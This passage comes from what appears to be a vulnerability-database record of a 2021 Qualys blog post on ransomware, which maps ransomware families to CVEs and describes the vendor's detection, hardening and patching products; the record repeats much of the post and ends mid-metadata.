misconfiguration and take needed actions in the most impactful way. It also enables users to measure and track their effectiveness at addressing vulnerabilities or misconfigurations before they are used for ransomware attacks. \n\n\n\nIn addition, organizations should implement a good cyber hygiene program to scan vulnerabilities, discovery misconfigurations regularly with sufficient detection capabilities such as QIDs enabled, as well as an efficient automated process to deploy important security patches on targeted assets quickly with the scalability needed. \n\n### Qualys Ransomware Risk Assessment &amp; Remediation Service\n\nQualys provides an all-in-one solution to discover, assess, prioritize, monitor, and patch critical vulnerabilities in real time and across your global hybrid-IT landscape. The following sections provide an overview of each of the critical components from Qualys product portfolio and how they can be uniquely valuable in the effort of combatting ransomware attacks. \n\n#### Detect your critical data assets &amp; monitor security blind-spots with CyberSecurity Asset Management (CSAM) \n\nEnables organizations to automatically discover every asset in their environment, including unmanaged assets appearing on the network, inventory all hardware and software, and classify and tag critical assets. \n\n#### Discover, Inventory and Categorize assets \n\nIt is important to know your blind spots to protect against ransomware. Use CSAM to discover all assets, including the ones that are exposed to the internet as well as unknown/unmanaged assets that are connecting to your network. \n\nCSAM automatically organizes your assets by their functional category by analyzing their hardware and installed software. Extends your inventory by incorporating key business information from your CMDB, such as status, environment, ownership, support groups, and business criticality.\n\n\n\n#### Monitor &amp; detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n#### Monitor &amp; detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n\n\n### Continuous detection &amp; prioritization for Ransomware-specific vulnerabilities with VMDR \n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with open ports. For example, hosts with Remote Desktop Protocol (RDP) enabled. \n\n_operatingSystem.category1:`Windows` and openPorts.port:`3389`_ \n\n\n\nOnce the hosts with RDP are identified, they can be grouped together with a \u2018dynamic tag\u2019, let us say \u2013 \u201cRDP Asset\u201d. This helps in automatically grouping existing hosts with this vulnerability as well as any new hosts that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### **Discover and Prioritize Ransomware Vulnerabilities** \n\nNow that hosts with \u201cRDP\u201d are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Windows RDP, Exchange Server vulnerability and more based on the always updated Knowledgebase. \n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Ransomware asset tag in the vulnerabilities view by using this QQL query: \n\n**vulnerabilities.vulnerability.threatIntel.ransomware: true** \n\nOr \n\n**vulnerabilities.vulnerability.ransomware.name:WannaCry** \n\nThis will return a list of all impacted hosts. \n\n\n\nUsing VMDR prioritization, the ransomware vulnerabilities can be easily prioritized using \u201cRansomware\u201d Real-Time Threat Intelligence: \n\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live threat feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\nSimply click on the impacted assets for the \u201cRansomware\u201d feeds to see the vulnerability and impacted host details.\n\n\n\nQualys provides the ability for a Unified Dashboard approach with the key metrics across all Apps providing key metrics against your overall security posture against Ransomware Related data points such as: \n\n * Ransomware Related vulnerabilities \n * Unauthorized Software \n * Misconfigurations leveraged by ransomware \n * Internet Facing Hosts with RDP vulnerabilities and many more\u2026 \n\nThe Unified Dashboard enabled you to track your ransomware exposure, against impacted hosts, their status, and overall management in real-time. \n\n### **Discover and Mitigate Ransomware Misconfigurations such as SMB, Insecure RDP** \n \n\n[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides the Ransomware Best Practices policy which contains the critical controls mapped to MITRE ATT&amp;CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [Fireye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attacker initial access and the lateral movement around the network. \n\nAs organizations look to prevent the attacks from happening in the first place, security teams should focus on implementing these controls proactively and effectively across all assets to reduce the risk. By automating the configuration assessment with Qualys Policy Compliance, organizations can ensure golden images to conform to security baselines and prevent images from ever having misconfigurations and identify configurations drifts to prevent security risks. \n\n#### **Mitigation or Important Precautionary Measures and Controls ** \n\nThe Qualys internal research team has identified top five security measures and configuration controls; a security team should consider for their organization to prevent business interruption from a ransomware attack. Research is based on best practices published by FireEye (Mandiant), Cybersecurity and Infrastructure Security Agency (CISA), and CISA MS-ISAC. Policies/technical controls should be implemented. These configuration checks go beyond typical CIS or DISA benchmarks. \n \n\n 1. Enforce Password Policies. e.g. \n * Minimum password age should be set, \n * Password complexity requirements should be enabled. \n * Enforce password history restrictions. \n 2. Employ best practices for use of Remote Desktop protocol e. g \n * Disable RDP services if not necessary. \n * Close unused RDP ports, Audit the network for systems using RDP. \n * Apply Multifactor authentication. \n * Disable or block Server Message Block (SMB) protocol and remove or disable outdated versions of SMB. \n * RDP account controls \n 3. Employ Network security and Firewalls e.g. \n * Enforce firewall policy rules. \n * Deny all rule and allow only required networks, access. \n * Common ports and protocols that should be blocked. \n 4. Enforce Account Use Policies. E.g. \n * Apply account lockouts after a specified number of attempts. \n * Admin approval requirements. \n * Apply UAC restrictions on network logons etc. \n * Least privileges are assigned to users. \n 5. Keep Software Updated \n * Ensure automatic updates are enabled. \n * Patches, software\u2019s should be installed and updated in a timely manner which includes operating systems, applications, etc. \n\n\n\nQualys research has mapped misconfigurations to the relevant MITRE ATTACK techniques (summarized in the table below) to define 237 configuration checks across five security areas such as RDP hardening, user controls, network, protocol and port configuration security, share and password policies and software update policies, essentially helping organizations proactively prevent 20 attack techniques leveraged in ransomware attacks. \n \n\n**TTP Map** \n\nInitial Access (TA0001)| Credential Access (TA0006)| Privilege Escalation (TA0004)| Execution (TA0002)| Defense Evasion (TA0005)| Lateral Movement (TA0008)| Command and Control (TA0011)| Impact (TA0040) \n---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Brute Force(T1110)| Abuse Elevation Control Mechanism (T1548)| Scheduled Task / Job (T1053)| Impair Defenses (T1562)| Remote Services (T1021)| Non-Application Layer Protocol (T1095)| Data Manipulation: Transmitted Data Manipulation (T1565.002) \nSupply Chain Compromise (T1195)| | Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)| Inter-Process Communication (T1559)| Trusted Developer Utilities Proxy Execution (T1127)| Exploitation of Remote Services (T1210)| | \nSupply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)| | Access Token Manipulation (T1134)| | | Remote Services (T1021)| | \n | Unsecured Credentials (T1552)| | | | Remote Services: Remote Desktop Protocol (T1021.001)| | \n | | | | | Remote Services: Remote Desktop Protocol (T1021.002)| | \n | | | | | Remote Service Session Hijacking (T1563)| | \n \n### **Automated Proactive &amp; Reactive Patching for Ransomware vulnerabilities ** \n\nTo keep the ransomware vulnerability patches always up to date on your assets, we strongly encourage users to take advantage of Qualys Zero-Touch Patch that allows users to automatically patch new ransomware-related vulnerabilities which are actively used in attacks. Qualys Zero-Touch Patch enables businesses to patch and address at least 97% of the ransomware related vulnerabilities. Faster and at scale! For more information on Qualys automatic patch capabilities, refer to blog [Automate Vulnerability Remediation with Proactive Zero-Touch Patch](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>). \n\nFollowing patch management best practices, using Qualys Patch Management, allows organizations to proactively remediate vulnerabilities related to ransomware and therefore minimize ransomware attacks in their environment. A simple and efficient way to use Qualys patch management to remediate ransomware related vulnerabilities is to leverage the VMDR prioritization report, as described in a previous section, this report can be used to detect assets with ransomware related vulnerabilities. The tight integration between Qualys VMDR and Patch Management allows customers to add those ransomware related vulnerabilities directly from the prioritization report into a patch job. The Qualys engine will automatically map the selected vulnerabilities to the relevant patches, in the customer\u2019s environment, that are required to remediate the vulnerabilities. This will allow IT teams to focus on deploying those patch jobs without the need to worry about researching vulnerabilities and manually finding the relevant patches for those vulnerabilities.\n\n\n\n### **Ready to Learn more and see for yourself?** \n\n[Join the webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>), Combating Risk from Ransomware Attacks, to discuss the current state of ransomware and prevention techniques. Webinar October 21, 2021, at 10am Pacific. Sign up now! \n\n**Resources** \n \n\n * [Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>) \n * [Ransomware Assessment Service Video](<https://vimeo.com/617379785/>) \n * [Research Powered Qualys Ransomware Risk Assessment &amp; Remediation service](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>) \n * [Try Qualys Ransomware Risk Assessment Service](<https://www.qualys.com/forms/ransomware/>) \n * Learn more about the research and see the Qualys Ransomware Risk Assessment &amp; Remediation service in action by attending the [webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>) \n\n### References\n\n<https://www.ic3.gov/Content/PDF/Ransomware_Fact_Sheet.pdf> <https://www.ic3.gov/Media/Y2019/PSA191002> <https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf>", "published": "2021-10-05T12:50:00", "modified": "2021-10-05T12:50:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": true, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://blog.qualys.com/category/product-tech", "reporter": "Anand Paturi", "references": [], "cvelist": ["CVE-2013-2551", "CVE-2015-8651", "CVE-2016-1019", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-30116", "CVE-2021-34527"], "immutableFields": [], "lastseen": "2021-10-05T16:35:26", "history": [{"bulletin": {"id": "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "hash": "6711a1d75d7feabee66135185eba5e4a", "type": "qualysblog", "bulletinFamily": "blog", "title": "The Rise of Ransomware", "description": "With most employees still working from remote locations, ransomware attacks have increased steadily since the early months of the Covid-19 pandemic. According to the FBI\u2019s 2020 Internet Crime Report 2400+ ransomware-related incidents in 2020 resulted in a loss of about 29 million dollars. These numbers are only getting worse and do not include damage from incidents not reported to the FBI.\n\nRansomware attacks affect various industries worldwide, and ransomware demands continue to increase. Some recent examples include:\n\n * [Conti Ransomware:](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>) Conti ransomware is spread using spear phishing campaigns through tailored emails that contain malicious attachments or malicious links and via stolen or weak Remote Desktop Protocol (RDP) credentials. \n * [Netfilm Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>): Nefilim ransomware is distributed through exposed Remote Desktop Protocol (RDP) setups by brute-forcing them and using other known vulnerabilities for initial access, such as Citrix gateway devices.\n * [REvil Ransomware:](<https://blog.qualys.com/product-tech/2021/07/08/kaseya-revil-ransomware-attack-cve-2021-30116-automatically-discover-and-prioritize-using-qualys-vmdr>) REvil is a ransomware family that operates as ransomware-as-a-service (RaaS), has been linked to GOLD SOUTHFIELD, a financially motivated group, and was first identified in April 2019 according to MITRE.\n * [DarkSide Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/06/09/darkside-ransomware>) : DarkSide ransomware performs brute force attacks and exploits known vulnerabilities in the remote desktop protocol (RDP) to gain initial access. DarkSide ransomware, first seen in August 2020 and updated as v2.0 in March 2021, is associated with the DarkSide group and now often operates as RaaS.\n * [Michigan State University (May 2020)](<https://www.zdnet.com/article/michigan-state-university-hit-by-ransomware-gang/>) - The MSU administrators were given a week to pay an undisclosed ransom demand to decrypt their files. In case MSU officials refuse to pay or choose to restore backups, the cybercriminals were prepared to leak documents stolen from the university&#x27;s network on a special website the group is operating on the dark web.\n * [DearCry and Exchange vulnerabilities](<https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/>) - DearCry ransomware attacks exploited Microsoft Exchange Server vulnerabilities CVE-2021-26855 and CVE-2021-27065. These vulnerabilities were being widely exploited before patches were available. Forcing Microsoft to release out-of-band updates. \n * [Colonial Pipeline](<https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html>) - Colonial Pipeline was most likely target of ransomware attack due vulnerable, outdated version of Microsoft Exchange. Attackers potentially exploited these vulnerabilities, and as a result, Colonial Pipeline took its systems down to contain the threat, limiting gasoline supply to the east coast. \n\nAs seen above, industries ranging from education, manufacturing, electronics, research, health and more are As outlined in [_our blog_](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>), the Qualys Ransomware Risk Assessment &amp; Remediation service leverages the security intelligence which is curated by Qualys Research experts to map ransomware families to specific vulnerabilities, misconfigurations, and vulnerable software. The Qualys Ransomware Risk Assessment service enables organizations to:\n\n * Get a unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations, insecure remote desktop gateways (RDP), as well as detection of risky software in datacenter environment along with alerting for assets missing anti-malware solutions. \n * Accelerate remediation of Ransomware exposure~~s~~ with zero-touch patching by continuously patching ransomware-vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to help you keep software up to date. \n\n#### **Ransomware Infection Vectors**\n\nAlthough cyber criminals use a variety of techniques to infect victims with ransomware, the most common means of infection are: \n\n * **Remote Desktop Protocol** (RDP) vulnerabilities: RDP allows individuals to see and control the system remotely. It is a very common practice in organizations as it provides easy access to systems remotely. Once cybercriminals have RDP access, they can deploy malicious software on the system, making it inaccessible to legitimate users unless the victim pays the demanded ransom. Shodan search shows currently open and potentially vulnerable RDP services on the internet, and you can buy RDP access for [as low as US$3](<https://www.bankinfosecurity.com/how-much-that-rdp-credential-in-window-a-10590>). \n\n\n\n * **Email phishing campaigns**: Email is a prevalent medium to get malware into the target environment. Cybercriminals use emails to send malicious links to deploy malware on recipients\u2019 machines. It allows cybercriminals to steal sensitive data without breaking through network security and is very common among cybercriminals. \n * **Software vulnerabilities**: Software vulnerabilities are even more prevalent than phishing. Client- and server-side vulnerabilities allow criminals to take advantage of security weaknesses in widely used software programs, gain control of victim systems, and deploy ransomware. Vulnerabilities in VPN systems such as Pulse Secure VPN and Fortinet are common targets as well.\n\n#### **Ransomware Attacks and Exact CVEs To Prioritize for Monitoring**\n\nAs mentioned above known vulnerabilities and weakness are one of the top infection vectors. \n\nQualys research team has performed extensive research on 36 prevalent ransomware families and have mapped them to 64 CVEs and the 247 QIDs that can detect them. The following is just a sample list of some of most widely used ransomware in the attacks along with the CVEs leveraged to infect systems. \n\n**Ransomware**| **Description**| **CVE (s)**| QID (s) \n---|---|---|--- \nConti | The Conti ransomware strain will not only encrypt important files but will also exfiltrate them to a location controlled by the attacker. This method of extortion-ware is used to force victims to pay the ransom in order to avoid the sensitive data from being leaked. Conti operators are known to use well-known hacking tools such as Mimikatz and Cobalt Strike leading up to the encryption of files | CVE-2020-1472, CVE-2021-34527, \nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145 | 91680, \n91668, \n91785, \n91345, \n91360 \nTeslacrypt, PrincessLocker | TeslaCrypt ransomware was uploaded to VirusTotal in November 2014 but was more widely spread in early 2015 and continues to evolve. TeslaCrypt encrypts the files using AES-256 algorithm until the victim pays the ransom in either Bitcoin or Cash Cards. | CVE-2013-2551, CVE-2015-8651 | 168351, 168350, 124422, 168341, 168340, 100271, 124421 \nLocky, Cerber | Cerber ransomware is ransomware-as-a-service (RaaS), meaning an attacker can distribute the licensed copy of this ransomware over the internet and pay commissions to the developer. | CVE-2016-1019 | 256924, 256922, 177873, 176784, 296029, 296028, 170815, 170724, 170711, 170365, 256256, 170264, 236438, 170119, 256214, 170052, 276628, 236342, 157445, 169942, 169941, 169923, 276572, 169854, 169853, 176004, 196742, 196725, 370320, 276455, 175965, 168848, 168813, 168792, 168696, 168694, 168594, 100282, 124879, 124872 \nWannaCry, Badrabbit | The WannaCry ransomware \u2014 formally known as WanaCrypt0r 2.0 \u2014 spreads using an exploit called EternalBlue for a Windows OS vulnerability that Microsoft patched in March 2017. | CVE-2017-0145 | 91361, 91360, 91359, 91347, 91345 \nDearCRy, BlackKingdom | DearCry takes advantage of compromised Microsoft Exchange Servers with vulnerability CVE-2021-26855. When exploited, cybercriminals gain initial access to the Exchange Server and then install web shells. | CVE-2021-26855 | 50107, 50108 \n \n### Unified View of Critical Ransomware Risk Exposures\n\nIt is a daunting task to get a unified view of multiple critical ransomware exposures together such as internet-facing vulnerabilities, misconfigurations as well as unauthorized software. Qualys Ransomware Risk Assessment &amp; remediation service dashboard enables security teams to see all the internet-facing assets that are exposed to ransomware related vulnerability or misconfiguration and take needed actions in the most impactful way. It also enables users to measure and track their effectiveness at addressing vulnerabilities or misconfigurations before they are used for ransomware attacks. \n\n\n\nIn addition, organizations should implement a good cyber hygiene program to scan vulnerabilities, discovery misconfigurations regularly with sufficient detection capabilities such as QIDs enabled, as well as an efficient automated process to deploy important security patches on targeted assets quickly with the scalability needed. \n\n### Qualys Ransomware Risk Assessment &amp; Remediation Service\n\nQualys provides an all-in-one solution to discover, assess, prioritize, monitor, and patch critical vulnerabilities in real time and across your global hybrid-IT landscape. The following sections provide an overview of each of the critical components from Qualys product portfolio and how they can be uniquely valuable in the effort of combatting ransomware attacks. \n\n#### Detect your critical data assets &amp; monitor security blind-spots with CyberSecurity Asset Management (CSAM) \n\nEnables organizations to automatically discover every asset in their environment, including unmanaged assets appearing on the network, inventory all hardware and software, and classify and tag critical assets. \n\n#### Discover, Inventory and Categorize assets \n\nIt is important to know your blind spots to protect against ransomware. Use CSAM to discover all assets, including the ones that are exposed to the internet as well as unknown/unmanaged assets that are connecting to your network. \n\nCSAM automatically organizes your assets by their functional category by analyzing their hardware and installed software. Extends your inventory by incorporating key business information from your CMDB, such as status, environment, ownership, support groups, and business criticality.\n\n\n\n#### Monitor &amp; detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n#### Monitor &amp; detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n\n\n### Continuous detection &amp; prioritization for Ransomware-specific vulnerabilities with VMDR \n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with open ports. For example, hosts with Remote Desktop Protocol (RDP) enabled. \n\n_operatingSystem.category1:`Windows` and openPorts.port:`3389`_ \n\n\n\nOnce the hosts with RDP are identified, they can be grouped together with a \u2018dynamic tag\u2019, let us say \u2013 \u201cRDP Asset\u201d. This helps in automatically grouping existing hosts with this vulnerability as well as any new hosts that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### **Discover and Prioritize Ransomware Vulnerabilities** \n\nNow that hosts with \u201cRDP\u201d are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Windows RDP, Exchange Server vulnerability and more based on the always updated Knowledgebase. \n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Ransomware asset tag in the vulnerabilities view by using this QQL query: \n\n**vulnerabilities.vulnerability.threatIntel.ransomware: true** \n\nOr \n\n**vulnerabilities.vulnerability.ransomware.name:WannaCry** \n\nThis will return a list of all impacted hosts. \n\n\n\nUsing VMDR prioritization, the ransomware vulnerabilities can be easily prioritized using \u201cRansomware\u201d Real-Time Threat Intelligence: \n\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live threat feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\nSimply click on the impacted assets for the \u201cRansomware\u201d feeds to see the vulnerability and impacted host details.\n\n\n\nQualys provides the ability for a Unified Dashboard approach with the key metrics across all Apps providing key metrics against your overall security posture against Ransomware Related data points such as: \n\n * Ransomware Related vulnerabilities \n * Unauthorized Software \n * Misconfigurations leveraged by ransomware \n * Internet Facing Hosts with RDP vulnerabilities and many more\u2026 \n\nThe Unified Dashboard enabled you to track your ransomware exposure, against impacted hosts, their status, and overall management in real-time. \n\n### **Discover and Mitigate Ransomware Misconfigurations such as SMB, Insecure RDP** \n \n\n[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides the Ransomware Best Practices policy which contains the critical controls mapped to MITRE ATT&amp;CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [Fireye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attacker initial access and the lateral movement around the network. \n\nAs organizations look to prevent the attacks from happening in the first place, security teams should focus on implementing these controls proactively and effectively across all assets to reduce the risk. By automating the configuration assessment with Qualys Policy Compliance, organizations can ensure golden images to conform to security baselines and prevent images from ever having misconfigurations and identify configurations drifts to prevent security risks. \n\n#### **Mitigation or Important Precautionary Measures and Controls ** \n\nThe Qualys internal research team has identified top five security measures and configuration controls; a security team should consider for their organization to prevent business interruption from a ransomware attack. Research is based on best practices published by FireEye (Mandiant), Cybersecurity and Infrastructure Security Agency (CISA), and CISA MS-ISAC. Policies/technical controls should be implemented. These configuration checks go beyond typical CIS or DISA benchmarks. \n \n\n 1. Enforce Password Policies. e.g. \n * Minimum password age should be set, \n * Password complexity requirements should be enabled. \n * Enforce password history restrictions. \n 2. Employ best practices for use of Remote Desktop protocol e. g \n * Disable RDP services if not necessary. \n * Close unused RDP ports, Audit the network for systems using RDP. \n * Apply Multifactor authentication. \n * Disable or block Server Message Block (SMB) protocol and remove or disable outdated versions of SMB. \n * RDP account controls \n 3. Employ Network security and Firewalls e.g. \n * Enforce firewall policy rules. \n * Deny all rule and allow only required networks, access. \n * Common ports and protocols that should be blocked. \n 4. Enforce Account Use Policies. E.g. \n * Apply account lockouts after a specified number of attempts. \n * Admin approval requirements. \n * Apply UAC restrictions on network logons etc. \n * Least privileges are assigned to users. \n 5. Keep Software Updated \n * Ensure automatic updates are enabled. \n * Patches, software\u2019s should be installed and updated in a timely manner which includes operating systems, applications, etc. \n\n\n\nQualys research has mapped misconfigurations to the relevant MITRE ATTACK techniques (summarized in the table below) to define 237 configuration checks across five security areas such as RDP hardening, user controls, network, protocol and port configuration security, share and password policies and software update policies, essentially helping organizations proactively prevent 20 attack techniques leveraged in ransomware attacks. \n \n\n**TTP Map** \n\nInitial Access (TA0001)| Credential Access (TA0006)| Privilege Escalation (TA0004)| Execution (TA0002)| Defense Evasion (TA0005)| Lateral Movement (TA0008)| Command and Control (TA0011)| Impact (TA0040) \n---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Brute Force(T1110)| Abuse Elevation Control Mechanism (T1548)| Scheduled Task / Job (T1053)| Impair Defenses (T1562)| Remote Services (T1021)| Non-Application Layer Protocol (T1095)| Data Manipulation: Transmitted Data Manipulation (T1565.002) \nSupply Chain Compromise (T1195)| | Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)| Inter-Process Communication (T1559)| Trusted Developer Utilities Proxy Execution (T1127)| Exploitation of Remote Services (T1210)| | \nSupply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)| | Access Token Manipulation (T1134)| | | Remote Services (T1021)| | \n | Unsecured Credentials (T1552)| | | | Remote Services: Remote Desktop Protocol (T1021.001)| | \n | | | | | Remote Services: Remote Desktop Protocol (T1021.002)| | \n | | | | | Remote Service Session Hijacking (T1563)| | \n \n### **Automated Proactive &amp; Reactive Patching for Ransomware vulnerabilities ** \n\nTo keep the ransomware vulnerability patches always up to date on your assets, we strongly encourage users to take advantage of Qualys Zero-Touch Patch that allows users to automatically patch new ransomware-related vulnerabilities which are actively used in attacks. Qualys Zero-Touch Patch enables businesses to patch and address at least 97% of the ransomware related vulnerabilities. Faster and at scale! For more information on Qualys automatic patch capabilities, refer to blog [Automate Vulnerability Remediation with Proactive Zero-Touch Patch](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>). \n\nFollowing patch management best practices, using Qualys Patch Management, allows organizations to proactively remediate vulnerabilities related to ransomware and therefore minimize ransomware attacks in their environment. A simple and efficient way to use Qualys patch management to remediate ransomware related vulnerabilities is to leverage the VMDR prioritization report, as described in a previous section, this report can be used to detect assets with ransomware related vulnerabilities. The tight integration between Qualys VMDR and Patch Management allows customers to add those ransomware related vulnerabilities directly from the prioritization report into a patch job. The Qualys engine will automatically map the selected vulnerabilities to the relevant patches, in the customer\u2019s environment, that are required to remediate the vulnerabilities. This will allow IT teams to focus on deploying those patch jobs without the need to worry about researching vulnerabilities and manually finding the relevant patches for those vulnerabilities.\n\n\n\n### **Ready to Learn more and see for yourself?** \n\n[Join the webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>), Combating Risk from Ransomware Attacks, to discuss the current state of ransomware and prevention techniques. Webinar October 21, 2021, at 10am Pacific. Sign up now! \n\n**Resources** \n \n\n * [Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>)\n * [Ransomware Assessment Service Video](<https://vimeo.com/617379785/>)\n * [Research Powered Qualys Ransomware Risk Assessment &amp; Remediation service](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>)\n * [Try Qualys Ransomware Risk Assessment Service](<https://www.qualys.com/forms/ransomware/>)\n * Learn more about the research and see the Qualys Ransomware Risk Assessment &amp; Remediation service in action by attending the [webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>)\n\n### References\n\n<https://www.ic3.gov/Content/PDF/Ransomware_Fact_Sheet.pdf> <https://www.ic3.gov/Media/Y2019/PSA191002> <https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf>", "published": "2021-10-05T12:50:00", "modified": "2021-10-05T12:50:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": true, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 